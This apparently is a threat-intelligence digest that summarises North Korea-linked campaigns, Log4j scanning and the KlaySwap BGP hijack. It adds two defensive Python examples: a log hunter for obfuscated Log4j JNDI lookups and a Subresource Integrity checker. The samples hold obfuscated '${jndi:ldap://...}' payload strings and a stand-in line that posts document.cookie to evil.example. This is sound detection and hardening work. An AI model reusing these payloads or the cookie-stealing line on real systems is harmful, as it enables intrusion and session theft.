ASEC analyzed a malicious Word document disguised as a product introduction that appeared to target South Korean logistics or shopping-related organizations. The document reused metadata and macro-enablement lures from a prior information-theft Word campa…
2022: 296 reports
When users were on the cryptocurrency exchange, their browsers would load Kakao's JavaScript library directly from Kakao's servers at the following URL (see diagram): It was actually this URL that was the attacker's target, not any of the resources operat…
Kimsuky is assessed in the excerpt as a North Korea-backed APT focused on information theft, with 2021 activity continuing against defense, diplomacy, unification-related personnel, and reported energy and aerospace victims in South Korea. The group shift…
ESRC describes a North Korea-linked attack in South Korea that disguised malware as a hospital or medical institution health-check certificate issuance program. The installer combined a legitimate hospital certificate plugin with an encrypted backdoor res…
ASEC observed a malicious Hangul document distributed ahead of South Korea's 20th presidential election, disguised as a National Election Commission press release about shipboard voting. ASD telemetry indicated the HWP used an embedded OLE object to run a…
Hauri reported a macro-based malware document disguised as materials for an online expert roundtable about Korean nuclear armament. The brief source notes that when the macro runs, it collects user information and downloads additional malware for follow-o…
The 2022 UN Panel of Experts report says North Korea continued missile and nuclear development, including new short- and possibly medium-range missile testing, while seeking foreign material, technology, and know-how. The report identifies cyber activity, …
Huntress investigated targeted DPRK-backed APT activity against a nuclear or national-security think tank environment and identified BABYSHARK tradecraft in the intrusion. The actor maintained persistence through a scheduled task named GoogleUpdater that …
ESRC reports repeated North Korea-linked spear-phishing attempts against South Korean diplomacy, security, defense, unification, academic, and private-sector experts. The attackers sent a password-protected malicious Word document disguised as a profile f…
KISA described a targeted watering-hole attack in which a compromised Korean website redirected visitors through malicious scripts and IP filtering before delivering malware via software vulnerability exploitation. The attack chain included initial access…
ESRC identified a malicious Word document distributed as a Klip digital asset wallet customer-center notice, using the filename '[Klip Customer Center] Wrong Token Transfer Resolution Guide.doc'. The document used protected-content social engineering to p…
Google Cloud Threat Horizons described sustained Internet-wide scanning and exploitation attempts against vulnerable Apache Log4j instances after the December 2021 disclosure. Observed payload delivery heavily targeted ports 80 and 443 while using LDAP li…
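The scanning described above mostly arrives as `${jndi:...}` lookup strings in request paths, query strings and User-Agent headers, frequently wrapped in Log4j's own `${lower:}`, `${upper:}` and `${x:-default}` lookups or URL-encoded to slip past naive string matching. The following is an added example, not code from the Google Cloud report: it normalizes those common evasions and then hunts for JNDI lookups in Apache-style access log lines. The log lines, IP addresses and targets are constructed for the example.

```python
import re
import urllib.parse

# Constructed sample access log lines (combined format). Addresses are
# documentation ranges (RFC 5737), not real scanners.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.23:1389/a}"',
    '203.0.113.8 - - [10/Dec/2021:03:15:19 +0000] "GET /${${lower:j}${upper:n}di:${lower:l}dap://198.51.100.23:1389/x} HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:03:16:40 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F198.51.100.23%3A1099%2Fo%7D HTTP/1.1" 200 88 "-" "curl/7.68.0"',
    '198.51.100.5 - - [10/Dec/2021:03:17:02 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

# ${lower:j} / ${upper:n}: Log4j resolves these to the literal in the requested case.
CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
# ${::-j} or ${env:NOPE:-j}: an unresolvable lookup falls back to its default value.
DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# The lookup we actually care about: ${jndi:<scheme>://<host[:port]>/...}
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/\s}]+)", re.IGNORECASE)


def _resolve_case(m: re.Match) -> str:
    kind, value = m.group(1).lower(), m.group(2)
    return value.lower() if kind == "lower" else value.upper()


def normalize(s: str, max_rounds: int = 10) -> str:
    """Repeatedly URL-decode and collapse innermost literal-yielding lookups.

    Innermost lookups contain no nested '${', so each pass peels one layer;
    the loop stops when a pass changes nothing. max_rounds bounds the work
    on adversarial input with very deep nesting.
    """
    for _ in range(max_rounds):
        new = urllib.parse.unquote(s)
        new = CASE_LOOKUP.sub(_resolve_case, new)
        new = DEFAULT_LOOKUP.sub(lambda m: m.group(1), new)
        if new == s:
            return new
        s = new
    return s


def find_jndi(line: str):
    """Return (scheme, target, normalized_line) if the line carries a JNDI lookup."""
    norm = normalize(line)
    m = JNDI_LOOKUP.search(norm)
    if not m:
        return None
    return m.group(1).lower(), m.group(2), norm


def scan_access_log(lines):
    """Yield one hit per line containing a JNDI lookup, with the source IP
    (first token of the combined log format) and the callback scheme/target."""
    hits = []
    for line in lines:
        found = find_jndi(line)
        if found:
            scheme, target, norm = found
            hits.append({"src": line.split(" ", 1)[0], "scheme": scheme,
                         "target": target, "normalized": norm})
    return hits


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(f"{hit['src']} -> {hit['scheme']}://{hit['target']}")
```

This is a hunting aid for the noisy scanning traffic, not a substitute for patching: it only sees what the web server logged (headers such as X-Api-Version are usually not in the access log), and it does not attempt to resolve lookups that depend on server-side state, such as `${env:...}` or `${sys:...}` values that scanners also use for exfiltration.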
Watch Part 1 and Part 2 of our Crypto Crime webinar series. Want more insights into the 2020 State of Crypto Crime? Our latest report has original research and case studies on the trends shaping law enforcement and compliance for cryptocurrency in 2020, i…
S2W analyzed the KlaySwap incident as a BGP hijacking operation that redirected traffic for Kakao SDK delivery paths toward attacker-controlled infrastructure. The attacker issued a ZeroSSL certificate for developers.kakao.com, served a malicious kakao.mi…
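Both the earlier description of the exchange loading Kakao's JavaScript library straight from Kakao's servers and the S2W analysis above come down to the same point: once the delivery path is hijacked and the attacker holds a valid certificate for the hostname, TLS alone says nothing about whether the script body is the one the site expected. Subresource Integrity pins the body itself. The following is an added example, not code from S2W, KlaySwap or Kakao: it computes the `integrity` value for a pinned script and mirrors the browser's accept/reject decision on the fetched body. The "SDK" contents are constructed stand-ins, not the real Kakao SDK.

```python
import base64
import hashlib
import hmac

# Constructed stand-in for the genuine SDK file a site would pin (not the real Kakao SDK).
GOOD_SDK = b"window.Kakao = { init: function (key) { this.key = key; } };\n"
# Constructed stand-in for the same file with an injected routine appended by an attacker.
TAMPERED_SDK = GOOD_SDK + b"fetch('https://evil.example/c', {method:'POST', body: document.cookie});\n"

# Algorithms the SRI spec lets browsers honour; anything else is ignored.
SUPPORTED = {"sha256": hashlib.sha256, "sha384": hashlib.sha384, "sha512": hashlib.sha512}


def sri_integrity(body: bytes, algo: str = "sha384") -> str:
    """Return the value for <script integrity="...">: '<algo>-' followed by
    the standard base64 digest of the exact bytes the server will send."""
    if algo not in SUPPORTED:
        raise ValueError(f"unsupported SRI algorithm: {algo}")
    digest = SUPPORTED[algo](body).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def pinned_script_tag(src: str, body: bytes) -> str:
    """Render the tag a site would ship. crossorigin is required for SRI on
    cross-origin scripts, and the host must answer with CORS headers."""
    return (f'<script src="{src}" integrity="{sri_integrity(body)}" '
            f'crossorigin="anonymous"></script>')


def sri_matches(body: bytes, integrity_attr: str) -> bool:
    """Mirror the browser's decision for a fetched body.

    The attribute may hold several space-separated tokens. The browser keeps
    only tokens of the strongest supported algorithm present and accepts the
    body if ANY of them matches. If no token is usable, the spec treats the
    attribute as absent and the body is accepted; callers should regard that
    as a configuration bug, since it means nothing was pinned.
    """
    by_algo = {}
    for token in integrity_attr.split():
        algo, _, b64 = token.partition("-")
        algo = algo.lower()
        if algo in SUPPORTED and b64:
            by_algo.setdefault(algo, []).append(b64)
    if not by_algo:
        return True
    strongest = max(by_algo, key=lambda a: SUPPORTED[a]().digest_size)
    actual = base64.b64encode(SUPPORTED[strongest](body).digest()).decode("ascii")
    return any(hmac.compare_digest(actual, candidate) for candidate in by_algo[strongest])


if __name__ == "__main__":
    # Hypothetical pinned URL; version-pin the path so the hash stays valid.
    pin = sri_integrity(GOOD_SDK)
    print(pinned_script_tag("https://sdk.example/v1.0.0/sdk.min.js", GOOD_SDK))
    print("genuine body accepted:", sri_matches(GOOD_SDK, pin))
    print("tampered body accepted:", sri_matches(TAMPERED_SDK, pin))
```

Two caveats a practitioner will hit: SRI only works against a version-pinned URL, because any legitimate update to an unpinned path would also fail the check, and it does nothing for code the pinned script itself loads at runtime, so a self-hosted copy of the SDK is the more robust option where the vendor's terms allow it.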
AhnLab attributed a spear-phishing attempt against a university professor to Kimsuky, using a malicious Word document disguised as manuscript requirements for a North Korea-related publication. The document contained macros that downloaded Visual Basic Sc…